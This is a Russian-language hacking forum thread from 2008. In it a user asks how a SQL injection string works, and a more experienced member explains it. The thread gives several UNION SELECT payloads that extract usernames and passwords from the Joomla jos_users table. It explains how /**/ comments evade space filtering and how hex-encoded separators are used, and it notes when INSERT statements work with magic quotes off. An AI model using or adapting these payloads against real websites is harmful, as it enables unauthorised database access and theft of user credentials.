SQL Injection, помогите разобраться |
Ra1N
Специалист
Группа: Пользователи Сообщений: 455 Регистрация: 13.07.2005 Пользователь №: 28.722
Респектов: 8
Предупреждений: 2
| Приветствую!
У меня проблема следующего плана, есть сформированый до меня sql запрос: /**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/*
Очень хотелось бы составить свой, но меня пугают символы: /**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/* что они означают, и как с ними разобраться, не могли бы вы помочь, или хотя бы кинуть ссылку а толковый мануал?! | |
| |
12.03.2008 - 8:18 |
Soloton
Грамотный
Группа: Наши Люди Сообщений: 292 Регистрация: 18.12.2005 Из: Невинномысск Пользователь №: 88.260
Респектов: 72
| Цитата | Quote(Rain of Dark @ 12.03.2008 - 5:52) Это шестнадцатеричное представление символа : (двоеточие). | |
| |
12.03.2008 - 8:53 |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| Цитата | Quote есть сформированый до меня sql запрос Довольно странный запрос... Он в принципе рабочий? Не вижу подобраных колонок. Цитата | Quote /**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/* Если считать 0х3а не символом ":", то колонки 4, тогда (никогда в жизни не видел, чтобы их так подбирали): +union+select+1,concat(username,0x3a,password),3,4+from+jos_users +union+select+1,concat_ws(0x3a,username,password),3,4+from+jos_users +union+select+1,concat(aes_decrypt(aes_encrypt(username,0x3a,password),3,4+from+ jos_users + заменишь на /**/ если не прокатит... PS: покажи где ты оное нашел. | |
| |
12.03.2008 - 13:13 |
Ra1N
Специалист
Группа: Пользователи Сообщений: 455 Регистрация: 13.07.2005 Пользователь №: 28.722
Респектов: 8
Предупреждений: 2
| Цитата | Quote(delay(0) @ 12.03.2008 - 16:56) Цитата | Quote есть сформированый до меня sql запрос Довольно странный запрос... Он в принципе рабочий? Не вижу подобраных колонок. Цитата | Quote /**/union/* */select/**/0x3a,username,0x3a,password,0x3a,0x3a/* */from/**/jos_users/* Если считать 0х3а не символом ":", то колонки 4, тогда (никогда в жизни не видел, чтобы их так подбирали): +union+select+1,concat(username,0x3a,password),3,4+from+jos_users +union+select+1,concat_ws(0x3a,username,password),3,4+from+jos_users +union+select+1,concat(aes_decrypt(aes_encrypt(username,0x3a,password),3,4+from+ jos_users + заменишь на /**/ если не прокатит... PS: покажи где ты оное нашел. _http://www.xakep.ru/post/42707/default.aspто есть я правильно понимаю? "/**/"="+", а "0x3a"=":" А почему тогда просто "+" не использовали? А что означает фраза: "Если считать 0х3а не символом ":", то колонки 4, тогда (никогда в жизни не видел, чтобы их так подбирали):"? а можно вместо select insert использовать? | |
| |
12.03.2008 - 16:07 |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| Цитата | Quote(Rain of Dark @ 12.03.2008 - 13:16) то есть я правильно понимаю? "/**/"="+", а "0x3a"=":" Нет, /**/ - обход фильтрации пробелов, "+", он же %20, он же пробел, может фильтроваться в запросах. Цитата | Quote(Rain of Dark @ 12.03.2008 - 13:16) А почему тогда просто "+" не использовали? См. выше. Цитата | Quote(Rain of Dark @ 12.03.2008 - 13:16) А что означает фраза: "Если считать 0х3а не символом ":", то колонки 4, тогда (никогда в жизни не видел, чтобы их так подбирали):"? Почитай статьи по sql-иньекциям, их в интернете великое множество. Цитата | Quote(Rain of Dark @ 12.03.2008 - 13:16) а можно вместо select insert использовать? Нет, после union insert использовать нельзя. | |
| |
12.03.2008 - 16:35 |
Ra1N
Специалист
Группа: Пользователи Сообщений: 455 Регистрация: 13.07.2005 Пользователь №: 28.722
Респектов: 8
Предупреждений: 2
| Цитата | Quote(delay(0) @ 13.03.2008 - 0:10) Нет, после union insert использовать нельзя а вообще, кроме select? | |
| |
12.03.2008 - 18:45 |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| Цитата | Quote(Rain of Dark @ 12.03.2008 - 16:38) Что? | |
| |
13.03.2008 - 6:38 |
Ra1N
Специалист
Группа: Пользователи Сообщений: 455 Регистрация: 13.07.2005 Пользователь №: 28.722
Респектов: 8
Предупреждений: 2
| Цитата | Quote(delay(0) @ 13.03.2008 - 2:48) Что? ну кроме select что нибидь можно использовать? ну там, update, delete, и т.д | |
| |
13.03.2008 - 8:12 |
de1ay
профи!
[SoftoRooMTeaM]
Группа: Наши Люди Сообщений: 4.437 Регистрация: 14.10.2005 Из: EU Пользователь №: 1.010
Респектов: 613
| Цитата | Quote(Rain of Dark @ 13.03.2008 - 6:41) ну кроме select что нибидь можно использовать? ну там, update, delete, и т.д Тю, я ступил, insert юзать можно, но при magic quotes = off, тоесть, ' не должны экранироваться. | |
| |
|
|